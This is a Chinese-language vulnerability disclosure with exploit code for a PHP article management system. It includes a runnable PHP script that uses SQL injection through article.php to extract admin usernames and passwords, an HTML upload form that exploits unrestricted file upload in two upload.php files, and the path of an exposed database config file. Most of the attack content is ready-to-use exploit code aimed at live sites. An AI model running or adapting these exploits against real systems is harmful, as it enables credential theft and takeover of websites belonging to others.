简要描述：
 

// pageArt.php //..略 $column = $_POST["column"]; $rownum = $_POST["rownum"]; $sql = " select id,title,addtime from lpc_article where column_id=".$column; //..略 其他类似文件..略 Exp:

<?php
error_reporting(E_ERROR);
print_r('
+---------------------------------------------------------------------+
Sql injection Vul Exploit

Exp :黑小子 cfking
Home: [url]www.2cto.com [/url] [url]www.webvul.com[/url]
2011.09.20
+---------------------------------------------------------------------+
');

if ($argc < 2) {
print_r('
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' [url]www.2cto.com [/url] test
');
die();
}
ob_start();
$host = $argv[1];
$path= $argv[2];
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
fwrite($sock, "GET /article.php?id=255%20and%2201=2%20union+select+0,concat(0x63666B696E677339307365637E,uname,0x2D,upass,0x7E31),0,0,0,0,0,0+from+lpc_admin+LIMIT+0,1-- HTTP/1.1\r\n");
fwrite($sock, "Host: $host\r\n");
fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2\r\n");
fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
fwrite($sock, "Accept-Language: zh-cn,zh;q=0.5\r\n");
fwrite($sock, "Connection: keep-alive\r\n\r\n");
$headers = "";
while ($str = trim(fgets($sock, 1024)))
$headers .= "$str\n";
$body = "";
while (!feof($sock))
$body .= fgets($sock, 1024);
fclose($sock);
ob_end_flush();
//print_r($body);
if (strpos($body, 'cfkings90sec') !== false) {
preg_match('/cfkings90sec~(.*?)~1/', $body, $arr);
$result=explode("-",$arr[1]);
print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");

}
else{
print_r("Exploit Failed! \n");
}

文件上传：
 

漏洞文件 :admin/column/upload.php
 

admin/article/upload.php   $upload_dir = '../../uploads/';  $file_path = $upload_dir . $_FILES['myfile']['name'];  $MAX_SIZE = 20000000;  echo $_POST['buttoninfo'];  ......   if($_FILES['myfile']['size']>$MAX_SIZE)  echo "上传的文件大小超过了规定大小";   if($_FILES['myfile']['size'] == 0)  echo "请选择上传的文件";   if(!move_uploaded_file( $_FILES['myfile']['tmp_name'], $file_path))  echo "复制文件失败，请重新上传";

 两个文件都没任何限制！

Exp:
 

<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<form enctype="multipart/form-data" action="http://www.2cto.com /admin/column/upload.php" method="post">
<p>上传后网站跟目录/uploads/你上传的文件名<p>
<input type="file" name="myfile" size="20">
<input type="submit" value="Upload">
</form>

 
 信息泄漏：

10 http://www.2cto.com /admin/lib/db/config.xml